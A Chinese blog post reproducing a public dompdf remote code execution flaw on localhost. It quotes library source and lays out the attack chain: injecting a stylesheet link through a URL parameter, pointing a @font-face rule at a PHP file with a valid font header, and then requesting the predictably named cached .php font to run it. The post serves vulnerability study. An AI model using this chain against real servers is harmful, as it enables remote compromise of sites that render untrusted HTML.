<!DOCTYPE html>
<html lang="zh-cn" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="郁涛丶" />
  <meta name="description" content="" />
  
  
  <title>
    
      dompdf 0day(RCE)复现 
      
      
      |
    
     郁涛丶&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">

  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="郁涛丶's Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Ghostasky</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


    <!-- LaTex Display -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>


        
            
                <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>



                    
                        
                                
                                        
                                                
                                                        
                                                            <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
                                                            <div class="container post-details" id="post-details">
                                                                <div class="post-content">
                                                                    <div class="post-title">
                                                                        dompdf 0day(RCE)复现
                                                                    </div>
                                                                    <div class="post-attach">
                                                                        <span class="post-pubtime">
        <i class="iconfont icon-updatetime" title="Update time"></i>
        2022-03-19
      </span>

                                                                        <span class="post-pubtime"> 本文共1.2k字 </span>

                                                                        <span class="post-pubtime">
        大约需要9min
      </span>

                                                                        
                                                                                    <span class="post-categories">
        <i class="iconfont icon-bookmark" title="Categories"></i>
        
        <span class="span--category">
          <a href="/categories/Technology/" title="Technology">
            <b>#</b> Technology
          </a>
        </span>
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            <span class="post-tags">
        <i class="iconfont icon-tags" title="Tags"></i>
        
        <span class="span--tag">
          <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" title="漏洞复现">
            <b>#</b> 漏洞复现
          </a>
        </span>
                                                                            
                                                                                </span>
                                                                                
                                                                    </div>
                                                                    <div class="markdown-body">
                                                                        <p>这次的漏洞是<code>dompdf</code>这样一个php的库，dompdf库用于将html呈现为pdf，还是比较新的。</p>
<p>最开始这个漏洞并不是rce，而是xss。</p>
<p>首先是两个配置：</p>
<p>在 PDF 渲染期间执行嵌入式 PHP，之后的被禁用了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">* Enable embedded PHP</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* If this setting is set to true then DOMPDF will automatically evaluate</span></span><br><span class="line"><span class="comment">* embedded PHP contained within  ...  tags.</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* ==== IMPORTANT ====</span></span><br><span class="line"><span class="comment">* Enabling this for documents you do not trust (e.g. arbitrary remote html</span></span><br><span class="line"><span class="comment">* pages) is a security risk. Embedded scripts are run with the same level of</span></span><br><span class="line"><span class="comment">* system access available to dompdf. Set this option to false (recommended)</span></span><br><span class="line"><span class="comment">* if you wish to process untrusted documents.</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* This setting may increase the risk of system exploit. Do not change</span></span><br><span class="line"><span class="comment">* this settings without understanding the consequences. Additional</span></span><br><span class="line"><span class="comment">* documentation is available on the dompdf wiki at:</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* <span class="doctag">@var</span> bool</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="keyword">private</span> <span class="variable">$isPhpEnabled</span> = <span class="literal">false</span>;</span><br></pre></td></tr></table></figure>

<p>远程资源加载：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">* Enable remote file access</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* If this setting is set to true, DOMPDF will access remote sites for</span></span><br><span class="line"><span class="comment">* images and CSS files as required.</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* ==== IMPORTANT ====</span></span><br><span class="line"><span class="comment">* This can be a security risk, in particular in combination with isPhpEnabled and</span></span><br><span class="line"><span class="comment">* allowing remote html code to be passed to $dompdf = new DOMPDF(); $dompdf-&gt;load_html(...);</span></span><br><span class="line"><span class="comment">* This allows anonymous users to download legally doubtful internet content which on</span></span><br><span class="line"><span class="comment">* tracing back appears to being downloaded by your server, or allows malicious php code</span></span><br><span class="line"><span class="comment">* in remote html pages to be executed by your server with your account privileges.</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* This setting may increase the risk of system exploit. Do not change</span></span><br><span class="line"><span class="comment">* this settings without understanding the consequences. Additional</span></span><br><span class="line"><span class="comment">* documentation is available on the dompdf wiki at:</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* <span class="doctag">@var</span> bool</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="keyword">private</span> <span class="variable">$isRemoteEnabled</span> = <span class="literal">false</span>;</span><br></pre></td></tr></table></figure>

<p>查看这个是否开启可以xss构造：<code>?t=aa&lt;link rel=stylesheet href=&quot;xxxxxxx/test.css&quot;&gt;&amp;pdf</code>，来包含一个外部css，判断这个选项是否开启。</p>
<p>若开启，dompdf即允许通过font-face 的css来加载自定义的字体。</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">@font-face</span> &#123;</span><br><span class="line">    <span class="attribute">font-family</span>:<span class="string">&#x27;exploitfont&#x27;</span>;</span><br><span class="line">    <span class="attribute">src</span>:<span class="built_in">url</span>(<span class="string">&#x27;http://localhost:9001/xxxx.ttf&#x27;</span>);</span><br><span class="line">    <span class="attribute">font-weight</span>:<span class="string">&#x27;normal&#x27;</span>;</span><br><span class="line">    <span class="attribute">font-style</span>:<span class="string">&#x27;normal&#x27;</span>;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>使用外部字体的时候，dompdf将其存在<code>/lib/fonts</code>的目录中，并在<code>dompdf_font_family_cache.php</code>using中添加相应的条目<code>saveFontFamilies()</code>，这个函数将 dompdf 已知的字体编码为 PHP 数组，以及稍后查找它们所需的信息。：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Saves the stored font family cache</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The name and location of the cache file are determined by &#123;<span class="doctag">@link</span></span></span><br><span class="line"><span class="comment"> * FontMetrics::CACHE_FILE&#125;. This file should be writable by the</span></span><br><span class="line"><span class="comment"> * webserver process.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@see</span> FontMetrics::loadFontFamilies()</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">saveFontFamilies</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// replace the path to the DOMPDF font directories with the corresponding constants (allows for more portability)</span></span><br><span class="line">    <span class="variable">$cacheData</span> = sprintf(<span class="string">&quot;&lt;?php return function (%s, %s) &#123;%s&quot;</span>, <span class="string">&#x27;$fontDir&#x27;</span>, <span class="string">&#x27;$rootDir&#x27;</span>, PHP_EOL);</span><br><span class="line">    <span class="variable">$cacheData</span> .= sprintf(<span class="string">&quot;return array (%s&quot;</span>, PHP_EOL);</span><br><span class="line">    <span class="keyword">foreach</span> (<span class="keyword">$this</span>-&gt;fontLookup <span class="keyword">as</span> <span class="variable">$family</span> =&gt; <span class="variable">$variants</span>) &#123;</span><br><span class="line">        <span class="variable">$cacheData</span> .= sprintf(<span class="string">&quot;  &#x27;%s&#x27; =&gt; array(%s&quot;</span>, addslashes(<span class="variable">$family</span>), PHP_EOL);</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$variants</span> <span class="keyword">as</span> <span class="variable">$variant</span> =&gt; <span class="variable">$path</span>) &#123;</span><br><span class="line">            <span class="variable">$path</span> = sprintf(<span class="string">&quot;&#x27;%s&#x27;&quot;</span>, <span class="variable">$path</span>);</span><br><span class="line">            <span class="variable">$path</span> = str_replace(<span class="string">&#x27;\&#x27;&#x27;</span> . <span class="keyword">$this</span>-&gt;options-&gt;getFontDir(), <span class="string">&#x27;$fontDir . \&#x27;&#x27;</span>, <span class="variable">$path</span>);</span><br><span class="line">            <span class="variable">$path</span> = str_replace(<span class="string">&#x27;\&#x27;&#x27;</span> . <span class="keyword">$this</span>-&gt;options-&gt;getRootDir(), <span class="string">&#x27;$rootDir . \&#x27;&#x27;</span>, <span class="variable">$path</span>);</span><br><span class="line">            <span class="variable">$cacheData</span> .= sprintf(<span class="string">&quot;    &#x27;%s&#x27; =&gt; %s,%s&quot;</span>, <span class="variable">$variant</span>, <span class="variable">$path</span>, PHP_EOL);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$cacheData</span> .= sprintf(<span class="string">&quot;  ),%s&quot;</span>, PHP_EOL);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$cacheData</span> .= <span class="string">&quot;);&quot;</span> . PHP_EOL;</span><br><span class="line">    <span class="variable">$cacheData</span> .= <span class="string">&quot;&#125;; ?&gt;&quot;</span>;</span><br><span class="line">    file_put_contents(<span class="keyword">$this</span>-&gt;getCacheFile(), <span class="variable">$cacheData</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如果不能使用字体缓存索引，直接使用字体缓存是否可行？看下dompdf如何如何注册新字体(部分，具体在<a target="_blank" rel="noopener" href="https://github.com/dompdf/dompdf/blob/v1.2.0/src/FontMetrics.php#L174">这里</a>)：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">* <span class="doctag">@param</span> array $style</span></span><br><span class="line"><span class="comment">* <span class="doctag">@param</span> string $remoteFile</span></span><br><span class="line"><span class="comment">* <span class="doctag">@param</span> resource $context</span></span><br><span class="line"><span class="comment">* <span class="doctag">@return</span> bool</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">registerFont</span>(<span class="params"><span class="variable">$style</span>, <span class="variable">$remoteFile</span>, <span class="variable">$context</span> = <span class="literal">null</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">   <span class="variable">$fontname</span> = mb_strtolower(<span class="variable">$style</span>[<span class="string">&quot;family&quot;</span>]);</span><br><span class="line">   <span class="variable">$styleString</span> = <span class="keyword">$this</span>-&gt;getType(<span class="string">&quot;<span class="subst">&#123;$style[&#x27;weight&#x27;]&#125;</span> <span class="subst">&#123;$style[&#x27;style&#x27;]&#125;</span>&quot;</span>);</span><br><span class="line"></span><br><span class="line">   <span class="variable">$fontDir</span> = <span class="keyword">$this</span>-&gt;options-&gt;getFontDir();</span><br><span class="line">   <span class="variable">$remoteHash</span> = md5(<span class="variable">$remoteFile</span>);</span><br><span class="line"></span><br><span class="line">   <span class="variable">$prefix</span> = <span class="variable">$fontname</span> . <span class="string">&quot;_&quot;</span> . <span class="variable">$styleString</span>;</span><br><span class="line">   <span class="variable">$prefix</span> = preg_replace(<span class="string">&quot;[\\W]&quot;</span>, <span class="string">&quot;_&quot;</span>, <span class="variable">$prefix</span>);</span><br><span class="line">   <span class="variable">$prefix</span> = preg_replace(<span class="string">&quot;/[^-_\\w]+/&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="variable">$prefix</span>);</span><br><span class="line"></span><br><span class="line">   <span class="variable">$localFile</span> = <span class="variable">$fontDir</span> . <span class="string">&quot;/&quot;</span> . <span class="variable">$prefix</span> . <span class="string">&quot;_&quot;</span> . <span class="variable">$remoteHash</span>;</span><br><span class="line">   <span class="variable">$localFile</span> .= <span class="string">&quot;.&quot;</span>.strtolower(pathinfo(parse_url(<span class="variable">$remoteFile</span>, PHP_URL_PATH), PATHINFO_EXTENSION));</span><br><span class="line"></span><br><span class="line">   <span class="comment">// Download the remote file</span></span><br><span class="line">   <span class="keyword">list</span>(<span class="variable">$remoteFileContent</span>, <span class="variable">$http_response_header</span>) = @Helpers::getFileContent(<span class="variable">$remoteFile</span>, <span class="variable">$context</span>);</span><br><span class="line"></span><br><span class="line">   <span class="variable">$localTempFile</span> = @tempnam(<span class="keyword">$this</span>-&gt;options-&gt;get(<span class="string">&quot;tempDir&quot;</span>), <span class="string">&quot;dompdf-font-&quot;</span>);</span><br><span class="line">   file_put_contents(<span class="variable">$localTempFile</span>, <span class="variable">$remoteFileContent</span>);</span><br><span class="line"></span><br><span class="line">   <span class="variable">$font</span> = Font::load(<span class="variable">$localTempFile</span>);</span><br><span class="line"></span><br><span class="line">   <span class="keyword">if</span> (!<span class="variable">$font</span>) &#123;</span><br><span class="line">       unlink(<span class="variable">$localTempFile</span>);</span><br><span class="line">       <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">   &#125;</span><br><span class="line"></span><br><span class="line">   <span class="variable">$font</span>-&gt;parse();</span><br><span class="line">   <span class="variable">$font</span>-&gt;close();</span><br><span class="line"></span><br><span class="line">   unlink(<span class="variable">$localTempFile</span>);</span><br><span class="line"></span><br><span class="line">   <span class="comment">// Save the changes</span></span><br><span class="line">   file_put_contents(<span class="variable">$localFile</span>, <span class="variable">$remoteFileContent</span>);</span><br><span class="line">   <span class="keyword">$this</span>-&gt;saveFontFamilies();</span><br><span class="line"></span><br><span class="line">   <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到，新缓存字体的名字是确定了的，<code>字体名称</code>，<code>样式</code>，<code>MD5(RemoteURL)</code>这三个组成，比如，url是这样:<code>http://attacker.local/test_font.ttf</code>，样式为normal，那么将被存为：<code>testfont_normal_d249c21fbbb1302ab53282354d462d9e.ttf</code></p>
<p>![image-20220319110855454](dompdf 0day(RCE)复现&#x2F;image-20220319110855454.png)</p>
<p>那么这样的话，即使没有目录遍历的洞，也可以不用爆破直接知道文件名。</p>
<p>当然，上传的字体必须有效，必须能被加载和解析。</p>
<p>但是源码有个问题，他判断字体文件是否正常，是基于上传文件的文件头，类似Linux的判断方式，而不管文件后缀，那么即使使用其他后缀，只要符合<code>ttf</code>的文件头标准，仍可被解析。</p>
<p>下面是构造的<code>css</code>以及<code>ttf(php)</code>：</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">@font-face</span> &#123;</span><br><span class="line">    <span class="attribute">font-family</span>:<span class="string">&#x27;exploitfont&#x27;</span>;</span><br><span class="line">    <span class="attribute">src</span>:<span class="built_in">url</span>(<span class="string">&#x27;http://localhost:9001/exploit_font.php&#x27;</span>);</span><br><span class="line">    <span class="attribute">font-weight</span>:<span class="string">&#x27;normal&#x27;</span>;</span><br><span class="line">    <span class="attribute">font-style</span>:<span class="string">&#x27;normal&#x27;</span>;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/19/dompdf%200day(RCE)%E5%A4%8D%E7%8E%B0/image-20220319111650926.png" alt="image-20220319111650926"></p>
<p>至于ttf文件结构？网上一堆。。。</p>
<p>下面直接使用<a target="_blank" rel="noopener" href="https://github.com/positive-security/dompdf-rce">github</a>的来复现：</p>
<p>开启应用和exp：</p>
<p><img src="/2022/03/19/dompdf%200day(RCE)%E5%A4%8D%E7%8E%B0/image-20220319111921628.png" alt="image-20220319111921628"></p>
<p>使用exploit_font.php触发：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:9000/index.php?pdf&amp;title=&lt;link rel=stylesheet href=&#x27;http://localhost:9001/exploit.css&#x27;&gt;</span><br></pre></td></tr></table></figure>

<p>之后访问：<code>http://localhost:9000/dompdf/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php</code></p>
<p><img src="/2022/03/19/dompdf%200day(RCE)%E5%A4%8D%E7%8E%B0/image-20220319112233859.png" alt="image-20220319112233859"></p>
<p>成功触发。</p>
<p>u1s1这个洞完全可以出个CTF题，，</p>
<p>参考链接：</p>
<blockquote>
<p>  <a target="_blank" rel="noopener" href="https://positive.security/blog/dompdf-rce">https://positive.security/blog/dompdf-rce</a></p>
<p>  <a target="_blank" rel="noopener" href="https://github.com/positive-security/dompdf-rce">https://github.com/positive-security/dompdf-rce</a></p>
<p>  <a target="_blank" rel="noopener" href="https://juejin.cn/post/7010064099027451912">ttf文件格式</a></p>
</blockquote>

                                                                    </div>
                                                                    
                                                                        <div class="prev-or-next">
                                                                            <div class="post-foot-next">
                                                                                
                                                                                    <a href="/2022/03/19/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F&%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" target="_self">
                                                                                        <i class="iconfont icon-chevronleft"></i>
                                                                                        <span>Prev</span>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                            <div class="post-attach">
                                                                                <!-- <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2022-03-19
            </span> -->

                                                                                
                                                                                            <span class="post-categories">
          <!-- <i class="iconfont icon-bookmark" title="Categories"></i> -->
          
          <!-- <span class="span--category">
            <a href="/categories/Technology/" title="Technology">
              <b>#</b> Technology
            </a>
          </span> -->
                                                                                            
                                                                                                </span>
                                                                                                
                                                                                    <span class="post-tags">
          <!-- <i class="iconfont icon-tags" title="Tags"></i> -->
          
          <!-- <span class="span--tag">
            <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" title="漏洞复现">
              <b>#</b> 漏洞复现
            </a>
          </span> -->
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            </div>
                                                                            <div class="post-foot-prev">
                                                                                
                                                                                    <a href="/2022/03/20/CSLearn/" target="_self">
                                                                                        <span>Next</span>
                                                                                        <i class="iconfont icon-chevronright"></i>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                        </div>
                                                                        
                                                                </div>
                                                                

                                                                    
                                                                        <div class="comments-container">
                                                                            







                                                                        </div>
                                                                        
                                                            </div>
                                                            
        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Ghostasky">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" target="_blank" rel="noopener" href="https://twitter.com/ghostasky">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/Ghostasky">怕什么真理无穷，进一寸有进一寸的欢喜。</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2022 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
